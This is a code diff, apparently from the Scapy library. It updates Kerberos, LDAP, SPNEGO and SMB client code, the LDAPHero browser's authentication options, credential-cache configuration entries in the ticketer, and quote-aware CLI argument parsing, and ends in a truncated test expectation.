@@ # See https://scapy.net/ for more information """ -Python 2 and 3 link classes. +Compatibility module to various older versions of Python """ import base64 import binascii +import enum import struct import sys @@ -39,6 +40,7 @@ 'orb', 'plain_str', 'raw', + 'StrEnum', ] # Typing compatibility @@ -46,7 +48,7 @@ # Note: # supporting typing on multiple python versions is a nightmare. # we provide a FakeType class to be able to use types added on -# later Python versions (since we run mypy on 3.12), on older +# later Python versions (since we run mypy on 3.14), on older # ones. @@ -100,6 +102,15 @@ class Protocol: else: Self = _FakeType("Self") + +# Python 3.11 Only +if sys.version_info >= (3, 11): + from enum import StrEnum +else: + class StrEnum(str, enum.Enum): + pass + + ########### # Python3 # ########### diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index a3125382ed5..a282e80998b 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -3033,7 +3033,9 @@ class KerberosClient(Automaton): :param dmsa: sets the 'unconditional delegation' mode for DMSA TGT retrieval """ - RES_AS_MODE = namedtuple("AS_Result", ["asrep", "sessionkey", "kdcrep", "upn"]) + RES_AS_MODE = namedtuple( + "AS_Result", ["asrep", "sessionkey", "kdcrep", "upn", "pa_type"] + ) RES_TGS_MODE = namedtuple("TGS_Result", ["tgsrep", "sessionkey", "kdcrep", "upn"]) class MODE(IntEnum): @@ -3232,6 +3234,7 @@ def __init__( self.fast_req_sent = False # Session parameters self.pre_auth = False + self.pa_type = None # preauth-type that's used self.fast_rep = None self.fast_error = None self.fast_skey = None # The random subkey used for fast @@ -3574,8 +3577,9 @@ def as_req(self): ) # Build PA-DATA + self.pa_type = 16 # PA-PK-AS-REQ pafactor = PADATA( - padataType=16, # PA-PK-AS-REQ + padataType=self.pa_type, padataValue=PA_PK_AS_REQ( signedAuthpack=signedAuthpack, trustedCertifiers=None, @@ -3596,15 +3600,17 @@ def as_req(self): b"clientchallengearmor", b"challengelongterm", ) + self.pa_type = 138 # PA-ENCRYPTED-CHALLENGE pafactor = PADATA( - padataType=138, # PA-ENCRYPTED-CHALLENGE + padataType=self.pa_type, padataValue=EncryptedData(), ) else: # Usual 'timestamp' factor ts_key = self.key + self.pa_type = 2 # PA-ENC-TIMESTAMP pafactor = PADATA( - padataType=2, # PA-ENC-TIMESTAMP + padataType=self.pa_type, padataValue=EncryptedData(), ) pafactor.padataValue.encrypt( @@ -4078,6 +4084,7 @@ def decrypt_as_rep(self, pkt): res.key.toKey(), res, pkt.root.getUPN(), + self.pa_type, ) @ATMT.receive_condition(SENT_TGS_REQ) diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index 38651dacd45..cdb540ec7da 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -26,8 +26,6 @@ import struct import uuid -from enum import Enum - from scapy.arch import get_if_addr from scapy.ansmachine import AnsweringMachine from scapy.asn1.asn1 import ( @@ -62,6 +60,7 @@ ) from scapy.asn1packet import ASN1_Packet from scapy.config import conf +from scapy.compat import StrEnum from scapy.error import log_runtime from scapy.fields import ( FieldLenField, @@ -90,6 +89,7 @@ GSS_C_FLAGS, GSS_C_NO_CHANNEL_BINDINGS, GSS_S_COMPLETE, + GSS_S_CONTINUE_NEEDED, GssChannelBindings, SSP, _GSSAPI_Field, @@ -106,6 +106,7 @@ Any, Dict, List, + Optional, Union, ) @@ -1642,8 +1643,8 @@ def dclocator( ##################### -class LDAP_BIND_MECHS(Enum): - NONE = "UNAUTHENTICATED" +class LDAP_BIND_MECHS(StrEnum): + NONE = "ANONYMOUS" SIMPLE = "SIMPLE" SASL_GSSAPI = "GSSAPI" SASL_GSS_SPNEGO = "GSS-SPNEGO" @@ -1949,8 +1950,8 @@ def bind( self, mech, ssp=None, - sign=False, - encrypt=False, + sign: Optional[bool] = None, + encrypt: Optional[bool] = None, simple_username=None, simple_password=None, ): @@ -1966,6 +1967,12 @@ def bind( : This acts differently based on the :mech: provided during initialization. """ + # Bind default values: if NTLM then encrypt, else sign unless anonymous/simple + if encrypt is None: + encrypt = mech == LDAP_BIND_MECHS.SICILY + if sign is None and not encrypt: + sign = mech not in [LDAP_BIND_MECHS.NONE, LDAP_BIND_MECHS.SIMPLE] + # Store and check consistency self.mech = mech self.ssp = ssp # type: SSP @@ -2000,6 +2007,9 @@ def bind( elif mech in [LDAP_BIND_MECHS.NONE, LDAP_BIND_MECHS.SIMPLE]: if self.sign or self.encrypt: raise ValueError("Cannot use 'sign' or 'encrypt' with NONE or SIMPLE !") + else: + raise ValueError("Mech %s is still unimplemented !" % mech) + if self.ssp is not None and mech in [ LDAP_BIND_MECHS.NONE, LDAP_BIND_MECHS.SIMPLE, @@ -2105,6 +2115,10 @@ def bind( ), chan_bindings=self.chan_bindings, ) + if status not in [GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED]: + raise RuntimeError( + "%s: GSS_Init_sec_context failed !" % self.mech.name, + ) while token: resp = self.sr1( LDAP_BindRequest( @@ -2116,10 +2130,10 @@ def bind( ) ) if not isinstance(resp.protocolOp, LDAP_BindResponse): - if self.verb: - print("%s bind failed !" % self.mech.name) - resp.show() - return + raise LDAP_Exception( + "%s bind failed !" % self.mech.name, + resp=resp, + ) val = resp.protocolOp.serverSaslCredsData if not val: status = resp.protocolOp.resultCode @@ -2195,11 +2209,20 @@ def bind( "GSSAPI SASL failed to negotiate client security flags !", resp=resp, ) + + # If we use SPNEGO and NTLMSSP was used, understand we can't use sign + if self.mech == LDAP_BIND_MECHS.SASL_GSS_SPNEGO: + from scapy.layers.ntlm import NTLMSSP + + if isinstance(self.sspcontext.ssp, NTLMSSP): + self.sign = False + # SASL wrapping is now available. self.sasl_wrap = self.encrypt or self.sign if self.sasl_wrap: self.sock.closed = True # prevent closing by marking it as already closed. self.sock = StreamSocket(self.sock.ins, LDAP_SASL_Buffer) + # Success. if self.verb: print("%s bind succeeded !" % self.mech.name) @@ -2460,3 +2483,4 @@ def close(self): print("X Connection closed\n") self.sock.close() self.bound = False + self.sspcontext = None diff --git a/scapy/layers/smb.py b/scapy/layers/smb.py index 541ab10c292..ded79f15a4d 100644 --- a/scapy/layers/smb.py +++ b/scapy/layers/smb.py @@ -286,7 +286,7 @@ class SMBNegotiate_Request(Packet): bind_layers(SMB_Header, SMBNegotiate_Request, Command=0x72) -# SMBNegociate Protocol Response +# SMBNegotiate Protocol Response def _SMBStrNullField(name, default): diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index 61f26e8f8c7..cef9f6e6195 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -1323,7 +1323,7 @@ def shares_output(self, results): """ print(pretty_list(results, [("ShareName", "ShareType", "Comment")])) - @CLIUtil.addcommand(spaces=True) + @CLIUtil.addcommand(mono=True) def use(self, share): """ Open a share @@ -1391,7 +1391,7 @@ def _dir_complete(self, arg): return [results[0] + "\\"] return results - @CLIUtil.addcommand(spaces=True) + @CLIUtil.addcommand(mono=True) def ls(self, parent=None): """ List the files in the remote directory @@ -1466,7 +1466,7 @@ def ls_complete(self, folder): return [] return self._dir_complete(folder) - @CLIUtil.addcommand(spaces=True) + @CLIUtil.addcommand(mono=True) def cd(self, folder): """ Change the remote current directory @@ -1534,7 +1534,7 @@ def lls_output(self, results): pretty_list(results, [("FileName", "File Size", "Last Modification Time")]) ) - @CLIUtil.addcommand(spaces=True) + @CLIUtil.addcommand(mono=True) def lcd(self, folder): """ Change the local current directory @@ -1663,7 +1663,7 @@ def _getr(self, directory, _root, _verb=True): print(conf.color_theme.red(remote), "->", str(ex)) return size - @CLIUtil.addcommand(spaces=True, globsupport=True) + @CLIUtil.addcommand(mono=True, globsupport=True) def get(self, file, _dest=None, _verb=True, *, r=False): """ Retrieve a file @@ -1703,7 +1703,7 @@ def get_complete(self, file): return [] return self._fs_complete(file) - @CLIUtil.addcommand(spaces=True, globsupport=True) + @CLIUtil.addcommand(mono=True, globsupport=True) def cat(self, file): """ Print a file @@ -1731,7 +1731,7 @@ def cat_complete(self, file): return [] return self._fs_complete(file) - @CLIUtil.addcommand(spaces=True, globsupport=True) + @CLIUtil.addcommand(mono=True, globsupport=True) def put(self, file): """ Upload a file @@ -1756,7 +1756,7 @@ def put_complete(self, folder): """ return self._lfs_complete(folder, lambda x: not x.is_dir()) - @CLIUtil.addcommand(spaces=True) + @CLIUtil.addcommand(mono=True) def rm(self, file): """ Delete a file @@ -1799,7 +1799,7 @@ def backup(self): print("Backup Intent: On") self.extra_create_options.append("FILE_OPEN_FOR_BACKUP_INTENT") - @CLIUtil.addcommand(spaces=True) + @CLIUtil.addcommand(mono=True) def watch(self, folder): """ Watch file changes in folder (recursively) @@ -1826,7 +1826,7 @@ def watch(self, folder): pass print("Cancelled.") - @CLIUtil.addcommand(spaces=True) + @CLIUtil.addcommand(mono=True) def getsd(self, file): """ Get the Security Descriptor diff --git a/scapy/layers/spnego.py b/scapy/layers/spnego.py index a37091313b3..9f498711c0c 100644 --- a/scapy/layers/spnego.py +++ b/scapy/layers/spnego.py @@ -610,10 +610,15 @@ def get_supported_mechtypes(self): for ssp in self.ssps: mechs.extend(ssp.GSS_Inquire_names_for_mech()) - # 2. Sort according to the preference order. - mechs.sort(key=lambda x: self._PREF_ORDER.index(x)) + # 2. Sort according to the selected SSP, then the preference order + selected_mech_oids = ( + self.ssp.GSS_Inquire_names_for_mech() if self.ssp else [] + ) + mechs.sort( + key=lambda x: (x not in selected_mech_oids, self._PREF_ORDER.index(x)) + ) - # 3. Return wrapped in MechType + # 4. Return wrapped in MechType return [SPNEGO_MechType(oid=ASN1_OID(oid)) for oid in mechs] def negotiate_ssp(self) -> None: @@ -793,10 +798,12 @@ def from_cli_arguments( t.open_ccache(ccache) # Look for the ticket that we'll use. We chose: - # - either a ST if the SPN matches our target + # - either a ST if the UPN and SPN matches our target + # - or a ST that matches the UPN # - else a TGT if we got nothing better tgts = [] - for i, (tkt, key, upn, spn) in enumerate(t.iter_tickets()): + sts = [] + for i, (tkt, key, upn, spn) in t.enumerate_tickets(): spn, _ = _parse_spn(spn) spn_host = spn.split("/")[-1] # Check that it's for the correct user @@ -806,14 +813,20 @@ def from_cli_arguments( # TGT. Keep it, and see if we don't have a better ST. tgts.append(t.ssp(i)) elif hostname.lower() == spn_host.lower(): - # ST. We're done ! + # ST. UPN and SPN match. We're done ! ssps.append(t.ssp(i)) break + else: + # ST. UPN matches, Keep it + sts.append(t.ssp(i)) else: - # No ST found + # No perfect ticket found if tgts: # Using a TGT ! ssps.append(tgts[0]) + elif sts: + # Using a ST where at least the UPN matched ! + ssps.append(sts[0]) else: # Nothing found t.show() diff --git a/scapy/modules/ldaphero.py b/scapy/modules/ldaphero.py index 9ade79eb5d9..8e70095922d 100644 --- a/scapy/modules/ldaphero.py +++ b/scapy/modules/ldaphero.py @@ -123,37 +123,75 @@ def run(self) -> False: class LDAPHero: - """ + r""" LDAP Hero - LDAP GUI browser over Scapy's LDAP_Client - :param ssp: the SSP object to use when binding. + :param ssp: if provided, use this SSP for auth. :param mech: the LDAP_BIND_MECHS to use when binding. - :param simple_username: if provided, used for Simple binding (instead of the 'ssp') - :param simple_password: - :param encrypt: request encryption by default (useful when using 'ssp') + :param sign: request signature by default + :param encrypt: request encryption by default :param host: auto-connect to a specific host :param port: the port to connect to (default: 389/636) (This is only in use when using 'host') :param ssl: whether to use SSL to connect or not (This is only in use when using 'host') + + Authentication parameters: + + :param UPN: the upn to use (DOMAIN/USER, DOMAIN\USER, USER@DOMAIN or USER) + :param kerberos_required: require kerberos + :param password: if provided, used for auth + :param HashNt: if provided, used for auth (NTLM) + :param HashAes256Sha96: if provided, used for auth (Kerberos) + :param HashAes128Sha96: if provided, used for auth (Kerberos) """ def __init__( self, ssp: SSP = None, mech: LDAP_BIND_MECHS = None, - simple_username: str = None, - simple_password: str = None, + sign: bool = True, encrypt: bool = False, host: str = None, port: int = None, ssl: bool = False, + # Authentication + UPN: str = None, + password: str = None, + kerberos_required: bool = False, + HashNt: bytes = None, + HashAes256Sha96: bytes = None, + HashAes128Sha96: bytes = None, + use_krb5ccname: bool = False, ): self.client = LDAP_Client() + if ( + ssp is None + and mech in [None, LDAP_BIND_MECHS.SASL_GSS_SPNEGO] + and UPN + and host + ): + # We allow the SSP to be provided through arguments. + # In that case, use SPNEGO + mech = LDAP_BIND_MECHS.SASL_GSS_SPNEGO + ssp = SPNEGOSSP.from_cli_arguments( + UPN=UPN, + target=host, + password=password, + HashNt=HashNt, + HashAes256Sha96=HashAes256Sha96, + HashAes128Sha96=HashAes128Sha96, + kerberos_required=kerberos_required, + use_krb5ccname=use_krb5ccname, + ) self.ssp = ssp self.mech = mech - self.simple_username = simple_username - self.simple_password = simple_password + if mech == LDAP_BIND_MECHS.SIMPLE: + self.simple_username = UPN + self.simple_password = password + else: + self.simple_username = self.simple_password = None + self.sign = sign self.encrypt = encrypt # Session parameters self.connected = False @@ -317,6 +355,7 @@ def bind(self, *args): ssp=self.ssp, simple_username=self.simple_username, simple_password=self.simple_password, + sign=self.sign, encrypt=self.encrypt, ) except LDAP_Exception as ex: @@ -352,45 +391,66 @@ def bind(self, *args): domentry = tk.Entry(dlg, textvariable=domainv) domentry.grid(row=2, column=1) + # The "Bind Type" radio list bindtypefrm = ttk.LabelFrame( dlg, text="Bind type", ) bindtypev = tk.StringVar() - ttk.Radiobutton( + sicilybtn = ttk.Radiobutton( bindtypefrm, variable=bindtypev, text="Sicily bind (NTLM)", value=LDAP_BIND_MECHS.SICILY.value, - ).pack(anchor=tk.W) - ttk.Radiobutton( + ) + sicilybtn.pack(anchor=tk.W) + gssapibtn = ttk.Radiobutton( bindtypefrm, variable=bindtypev, text="GSSAPI bind (Kerberos)", value=LDAP_BIND_MECHS.SASL_GSSAPI.value, - ).pack(anchor=tk.W) - ttk.Radiobutton( + ) + gssapibtn.pack(anchor=tk.W) + spnegobtn = ttk.Radiobutton( bindtypefrm, variable=bindtypev, text="SPNEGO bind (NTLM/Kerberos)", value=LDAP_BIND_MECHS.SASL_GSS_SPNEGO.value, - ).pack(anchor=tk.W) - ttk.Radiobutton( + ) + spnegobtn.pack(anchor=tk.W) + simplebtn = ttk.Radiobutton( bindtypefrm, variable=bindtypev, text="Simple bind", value=LDAP_BIND_MECHS.SIMPLE.value, - ).pack(anchor=tk.W) + ) + simplebtn.pack(anchor=tk.W) bindtypefrm.grid(row=3, column=0, columnspan=2) + if "supportedSASLMechanisms" in self.rootDSE: + # Some algorithms might be unavailable + algs = self.rootDSE["supportedSASLMechanisms"] + if "GSSAPI" not in algs: + gssapibtn.config(state=tk.DISABLED) + if "GSS-SPNEGO" not in algs: + spnegobtn.config(state=tk.DISABLED) + + # Sign button + signv = tk.BooleanVar() + signv.set(self.sign) + ttk.Label(dlg, text="Sign traffic after bind").grid(row=4, column=0) + signbtn = ttk.Checkbutton(dlg, variable=signv) + signbtn.grid(row=4, column=1) + + # Encrypt button encryptv = tk.BooleanVar() encryptv.set(self.encrypt) - ttk.Label(dlg, text="Encrypt traffic after bind").grid(row=4, column=0) + ttk.Label(dlg, text="Encrypt traffic after bind").grid(row=5, column=0) encrbtn = ttk.Checkbutton(dlg, variable=encryptv) - encrbtn.grid(row=4, column=1) + encrbtn.grid(row=5, column=1) - ttk.Button(dlg, text="OK", command=popup.dismiss).grid(row=5, column=0) - ttk.Button(dlg, text="Cancel", command=popup.cancel).grid(row=5, column=1) + ttk.Button(dlg, text="OK", command=popup.dismiss).grid(row=6, column=0) + ttk.Button(dlg, text="Cancel", command=popup.cancel).grid(row=6, column=1) # Default state if self.dns_domain_name and not valid_ip(self.host): @@ -404,16 +464,20 @@ def bindtypechange(*args, **kwargs): bindtype = LDAP_BIND_MECHS(bindtypev.get()) if bindtype == LDAP_BIND_MECHS.SIMPLE: domentry.config(state=tk.DISABLED) + signbtn.config(state=tk.DISABLED) encrbtn.config(state=tk.DISABLED) encryptv.set(False) elif bindtype == LDAP_BIND_MECHS.SICILY: domentry.config(state=tk.DISABLED) + signbtn.config(state=tk.DISABLED) encrbtn.config(state=tk.NORMAL) else: domentry.config(state=tk.NORMAL, textvariable=domainv) + signbtn.config(state=tk.NORMAL) encrbtn.config(state=tk.NORMAL) - bindtypev.trace("w", bindtypechange) + bindtypev.trace_add("write", bindtypechange) + userf.focus() # Setup @@ -426,7 +490,8 @@ def bindtypechange(*args, **kwargs): password = passwordv.get() domain = domainv.get() bindtype = LDAP_BIND_MECHS(bindtypev.get()) - encrypt = encryptv.get() + self.sign = signv.get() + self.encrypt = encryptv.get() # Bind ! self.tprint("client.bind(%s, ...)" % bindtype) @@ -437,8 +502,9 @@ def bindtypechange(*args, **kwargs): self.ssp = None simple_username = username simple_password = password - encrypt = False + self.encrypt = False elif bindtype == LDAP_BIND_MECHS.SICILY: + self.sign = False self.ssp = NTLMSSP( UPN=username, PASSWORD=password, @@ -468,7 +534,8 @@ def bindtypechange(*args, **kwargs): ssp=self.ssp, simple_username=simple_username, simple_password=simple_password, - encrypt=encrypt, + sign=self.sign, + encrypt=self.encrypt, ) except LDAP_Exception as ex: self.tprint( @@ -536,7 +603,11 @@ def treedoubleclick(self, _): Action done on tree double-click. """ # Get clicked item - item = self.tk_tree.selection()[0] + try: + item = self.tk_tree.selection()[0] + except IndexError: + # Nothing is selected + return # Unclickable if self.tk_tree.tag_has("unclickable", item): diff --git a/scapy/modules/ticketer.py b/scapy/modules/ticketer.py index 8f8e9bfdd6c..93755d9198b 100644 --- a/scapy/modules/ticketer.py +++ b/scapy/modules/ticketer.py @@ -270,6 +270,9 @@ def set_from_krb(self, tkt, clientpart, sessionkey, kdcrep): # Set flags self.ticket_flags = int(kdcrep.flags.val, 2) + def is_xcacheconf(self): + return self.server.realm.data == b"X-CACHECONF:" + class CCache(Packet): fields_desc = [ @@ -330,7 +333,7 @@ class KeytabEntry(Packet): MayEnd(PacketField("key", KTKeyBlock(), KTKeyBlock)), ConditionalField( IntField("vno", None), - lambda pkt: "vno" in pkt.fields is not None or pkt.original, + lambda pkt: pkt.fields.get("vno", None) or pkt.original, ), ] @@ -536,20 +539,66 @@ def _to_str(x): print("No tickets in CCache.") return else: + if self.ccache.primary_principal.components: + print("Default principal: %s\n" % self.ccache.primary_principal.toPN()) + print("CCache tickets:") + # 1. Read configuration entries + configuration = collections.defaultdict(dict) + for cred in self.ccache.credentials: + if not cred.is_xcacheconf(): + # Skip non-configuration entries + continue + + if ( + len(cred.server.components) not in [2, 3] + or cred.server.components[0].data != b"krb5_ccache_conf_data" + ): + print("Skipping invalid X-CACHECONF !") + continue + + # Get all the values from this weird format + cname = cred.client.toPN() + key = cred.server.components[1].data.decode() + if len(cred.server.components) == 3: + sname = cred.server.components[2].data.decode() + else: + sname = None + value = cred.ticket.data.decode() + + # Store for this cname -> sname, the following 'key' setting. + configuration[(cname, sname)][key] = value + + # 2. Read credentials for i, cred in enumerate(self.ccache.credentials): - if cred.keyblock.keytype == 0: + if cred.is_xcacheconf(): + # Skip configuration entries continue + + # Get client and server principals + cname = cred.client.toPN() + sname = cred.server.toPN() + print( "%s. %s -> %s" % ( i, - cred.client.toPN(), - cred.server.toPN(), + cname, + sname, ) ) print(cred.sprintf(" %ticket_flags%")) + # If configuration entries match, show the settings here + print( + " " + + " ".join( + "%s=%s" % (key, value) + for _sname in [sname, None] + for key, value in configuration[(cname, _sname)].items() + if (cname, _sname) in configuration + ) + ) print( pretty_list( [ @@ -660,8 +709,30 @@ def remove_krb(self, i): :param i: the ticket to remove. """ + cred = self.ccache.credentials[i] + xcacheconfs = self.get_krb_xcacheopts(i) + + # Delete from the store del self.ccache.credentials[i] + # Among the remaining, do we have an option that's identical in name? + if any( + not xcred.is_xcacheconf() + and xcred.client.toPN() == cred.client.toPN() + and xcred.server.toPN() == cred.server.toPN() + for xcred in self.ccache.credentials + ): + # There is another ticket with the same client and server names. Stop here + return + + # There isno ticket exactly the same, remove all the xcacheconf that match + for xcred in xcacheconfs: + self.ccache.credentials.remove(xcred) + + # If this was the primary principal, remove from there + if cred.client.toPN() == self.ccache.primary_principal.toPN(): + self.ccache.primary_principal = CCPrincipal() + def import_krb(self, res, key=None, hash=None, _inplace=None): """ Import the result of krb_[tgs/as]_req or a Ticket into the CCache. @@ -676,6 +747,7 @@ def import_krb(self, res, key=None, hash=None, _inplace=None): cred = CCCredential() # Update the cred + xcacheconfs = {} if isinstance(res, KRB_Ticket): if key is None: key = self._prompt_hash( @@ -693,6 +765,11 @@ def import_krb(self, res, key=None, hash=None, _inplace=None): else: if isinstance(res, KerberosClient.RES_AS_MODE): rep = res.asrep + pa_type = res.pa_type + if pa_type is not None: + xcacheconfs["pa_type"] = str(pa_type) + if pa_type in [138]: + xcacheconfs["fast_avail"] = "yes" elif isinstance(res, KerberosClient.RES_TGS_MODE): rep = res.tgsrep @@ -712,6 +789,7 @@ def import_krb(self, res, key=None, hash=None, _inplace=None): ) else: raise ValueError("Unknown type of obj !") + cred.set_from_krb( rep.ticket, rep, @@ -721,7 +799,78 @@ def import_krb(self, res, key=None, hash=None, _inplace=None): # Append to ccache if _inplace is None: - self.ccache.credentials.append(cred) + _inplace = sum( + 1 for xcred in self.ccache.credentials if not xcred.is_xcacheconf() + ) + self.ccache.credentials.insert(_inplace, cred) + + # If this is the first credential, set it to primary + if len(self.ccache.credentials) == 1: + self.set_primary(_inplace) + + # For MIT kinit to be happy, we must provide extra options for the credential + for key, value in xcacheconfs.items(): + self.set_krb_xcacheconf(_inplace, key, value) + + def set_primary(self, i): + """ + Set the primary (=default) credential to the credential n°1 + """ + self.ccache.primary_principal = self.ccache.credentials[i].client + + def get_krb_xcacheopts(self, i: int): + """ + Get the X-CACHECONF config for a credential + """ + cred = self.ccache.credentials[i] + cname = cred.client.toPN() + sname = cred.server.toPN().encode() + return [ + xcred + for xcred in self.ccache.credentials + if ( + xcred.is_xcacheconf() + and xcred.client.toPN() == cname + and ( + len(xcred.server.components) == 2 + or xcred.server.components[2].data == sname + ) + ) + ] + + def set_krb_xcacheconf(self, i: int, key: str, value: str): + """ + Set a X-CACHECONF config for a credential + """ + key = key.encode() + value = value.encode() + cred = self.ccache.credentials[i] + sname = cred.server.toPN().encode() + + # First we look for a potential credential, if present + try: + conf_cred = next( + xcred + for xcred in self.get_krb_xcacheopts(i) + if xcred.server.components[1].data == key + ) + except StopIteration: + conf_cred = CCCredential( + client=cred.client, + server=CCPrincipal( + name_type=1, + realm=CCCountedOctetString(data=b"X-CACHECONF:"), + components=[ + CCCountedOctetString(data=b"krb5_ccache_conf_data"), + CCCountedOctetString(data=key), + CCCountedOctetString(data=sname), + ], + ), + ) + self.ccache.credentials.append(conf_cred) + + # Set value + conf_cred.ticket = CCCountedOctetString(data=value) def export_krb(self, i): """ @@ -764,17 +913,22 @@ def add_cred( # Detect if principal is a SPN or UPN and parse realm. realm = None - component = None + princname = None try: - component, realm = _parse_upn(principal) + _, realm = _parse_upn(principal) if salt is None and key is None: salt = krb_get_salt(principal) + princname = PrincipalName.fromSPN(principal) except ValueError: try: - component, realm = _parse_spn(principal) + _, realm = _parse_spn(principal) + princname = PrincipalName.fromSPN(principal) except ValueError: raise ValueError("Invalid principal ! (must be UPN or SPN)") + if not realm: + raise ValueError("Must provide the realm in the principal ! (with @DOMAIN)") + if salt is None and key is None: raise ValueError( "Salt could not be guessed. Please provide it, or provide 'mapupn' " @@ -821,17 +975,18 @@ def add_cred( ), components=[ KTCountedOctetString( - data=x, + data=x.val, ) - for x in component.split("/") + for x in princname.nameString ], timestamp=int(datetime.now().timestamp()), - vno8=kvno if kvno < 256 else None, + name_type=princname.nameType.val, + vno8=kvno, key=KTKeyBlock( keytype=key.etype, keyvalue=key.key, ), - vno=None if kvno < 256 else kvno, + vno=kvno, _parent=self.keytab, ) ) @@ -850,6 +1005,16 @@ def get_cred(self, principal, etype=None): "Note principals are case sensitive, as on ktpass.exe" ) + def remove_cred(self, principal, etype=None): + """ + Remove a credential from the Keytab by principal. + """ + for i, entry in enumerate(self.keytab.entries): + if entry.getPrincipal() == principal: + if etype is not None and etype != entry.key.keytype: + continue + del self.keytab.entries[i] + def ssp(self, i, **kwargs): """ Create a KerberosSSP from a ticket or from the keystore. @@ -2590,9 +2755,18 @@ def renew(self, i, ip=None, additional_tickets=[], **kwargs): self.import_krb(res, _inplace=i) + def enumerate_tickets(self): + """ + Enumerate through the tickets in the ccache + """ + for i, cred in enumerate(self.ccache.credentials): + if cred.is_xcacheconf(): + continue + yield i, self.export_krb(i) + def iter_tickets(self): """ Iterate through the tickets in the ccache """ - for i in range(len(self.ccache.credentials)): - yield self.export_krb(i) + for _, tkt in self.enumerate_tickets(): + yield tkt diff --git a/scapy/utils.py b/scapy/utils.py index 9b7ad90537d..2aea911462d 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -57,20 +57,20 @@ # Typing imports from typing import ( - cast, Any, AnyStr, Callable, + cast, Dict, IO, Iterator, List, Optional, - TYPE_CHECKING, + overload, Tuple, + TYPE_CHECKING, Type, Union, - overload, ) from scapy.compat import ( DecoratorCallable, @@ -3676,19 +3676,22 @@ def _parseallargs( @classmethod def addcommand( cls, - spaces: bool = False, + mono: bool = False, globsupport: bool = False, ) -> Callable[[DecoratorCallable], DecoratorCallable]: """ Decorator to register a command + + :param mono: if True, the command takes a single argument even + if there are spaces. """ def func(cmd: DecoratorCallable) -> DecoratorCallable: cmd.cliutil_type = _CLIUtilMetaclass.TYPE.COMMAND # type: ignore - cmd._spaces = spaces # type: ignore + cmd._mono = mono # type: ignore cmd._globsupport = globsupport # type: ignore cls._inspectkwargs(cmd) - if cmd._globsupport and not cmd._spaces: # type: ignore - raise ValueError("Cannot use globsupport without spaces.") + if cmd._globsupport and not cmd._mono: # type: ignore + raise ValueError("Cannot use globsupport without mono.") return cmd return func @@ -3705,13 +3708,17 @@ def func(processor: DecoratorCallable) -> DecoratorCallable: return func @classmethod - def addcomplete(cls, cmd: DecoratorCallable) -> Callable[[DecoratorCallable], DecoratorCallable]: # noqa: E501 + def addcomplete( + cls, + cmd: DecoratorCallable, + ) -> Callable[[DecoratorCallable], DecoratorCallable]: """ Decorator to register a command completor """ def func(processor: DecoratorCallable) -> DecoratorCallable: processor.cliutil_type = _CLIUtilMetaclass.TYPE.COMPLETE # type: ignore processor.cliutil_ref = cmd # type: ignore + processor._mono = cmd._mono # type: ignore return processor return func @@ -3782,6 +3789,40 @@ def _args(func: Any) -> str: ) ) + def _split_cmd(self, cmd: str) -> Tuple[List[str], List[int]]: + """ + Split the command in multiple arguments + """ + quoted = None + queue = [""] + offsets = [0] + for i, c in enumerate(cmd): + if c == "'" or c == '"': + # This is a quote. + if quoted is not None and quoted == c: + # We are closing the last quote + quoted = None + elif quoted: + queue[-1] += c + else: + quoted = c + elif c == " ": + # This is a space. + if quoted is not None: + # We're in a quote, append it + queue[-1] += c + elif queue[-1]: + # Not in a quote, this splits the argument. + queue += [""] + offsets.append(i) + else: + # Padding space, advance offset + offsets[-1] += 1 + else: + # This is a char + queue[-1] += c + return queue, offsets + def _completer(self) -> 'prompt_toolkit.completion.Completer': """ Returns a prompt_toolkit custom completer @@ -3793,7 +3834,7 @@ def get_completions(cmpl, document, complete_event): # type: ignore if not complete_event.completion_requested: # Only activate when the user does return - parts = document.text.split(" ") + parts, offsets = self._split_cmd(document.text) cmd = parts[0].lower() if cmd not in self.commands: # We are trying to complete the command @@ -3804,10 +3845,30 @@ def get_completions(cmpl, document, complete_event): # type: ignore if len(parts) == 1: return args, _, _ = self._parseallargs(self.commands[cmd], cmd, parts[1:]) - arg = " ".join(args) if cmd in self.commands_complete: - for possible_arg in self.commands_complete[cmd](self, arg): - yield Completion(possible_arg, start_position=-len(arg)) + completer = self.commands_complete[cmd] + # If the completion is 'mono', it's a single argument with + # spaces. Else we pass the list of arguments to complete, + # and we only complete the last argument. + if completer._mono: # type: ignore + arg = " ".join(args) + completions = completer(self, arg) + startpos = offsets[1] + else: + completions = completer(self, args) + startpos = offsets[-1] + + # For each possible completion + for possible_arg in completions: + # If there's a space in the completion, and we're + # not in mono mode, add quotes. + if " " in possible_arg and not completer._mono: # type: ignore # noqa: E501 + possible_arg = '"%s"' % possible_arg + + yield Completion( + possible_arg, + start_position=startpos - len(document.text) + 1 + ) return return CLICompleter() @@ -3826,8 +3887,9 @@ def loop(self, debug: int = 0) -> None: except EOFError: self.close() break - args = cmd.split(" ")[1:] - cmd = cmd.split(" ")[0].strip().lower() + parts, _ = self._split_cmd(cmd) + args = parts[1:] + cmd = parts[0].strip().lower() if not cmd: continue if cmd in ["help", "h", "?"]: @@ -3841,7 +3903,7 @@ def loop(self, debug: int = 0) -> None: # check the number of arguments func = self.commands[cmd] args, kwargs, outkwargs = self._parseallargs(func, cmd, args) - if func._spaces: # type: ignore + if func._mono: # type: ignore args = [" ".join(args)] # if globsupport is set, we might need to do several calls if func._globsupport and "*" in args[0]: # type: ignore @@ -3944,6 +4006,12 @@ def AutoArgparse( hexarguments.append(parname) elif param.annotation in [str, int, float]: paramkwargs["type"] = param.annotation + elif ( + isinstance(param.annotation, type) and + issubclass(param.annotation, enum.Enum) + ): + paramkwargs["type"] = param.annotation + paramkwargs["choices"] = list(param.annotation) else: continue if param.default != inspect.Parameter.empty: diff --git a/test/scapy/layers/kerberos.uts b/test/scapy/layers/kerberos.uts index 9f6607bb076..e7805b35c99 100644 --- a/test/scapy/layers/kerberos.uts +++ b/test/scapy/layers/kerberos.uts @@ -1037,9 +1037,12 @@ with ContextManagerCaptureOutput() as cmco: print(outp) assert outp == """ +Default principal: Administrator@DOMAIN.LOCAL + CCache tickets: 0. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL canonicalize+pre-authent+initial+renewable+proxiable+forwardable + 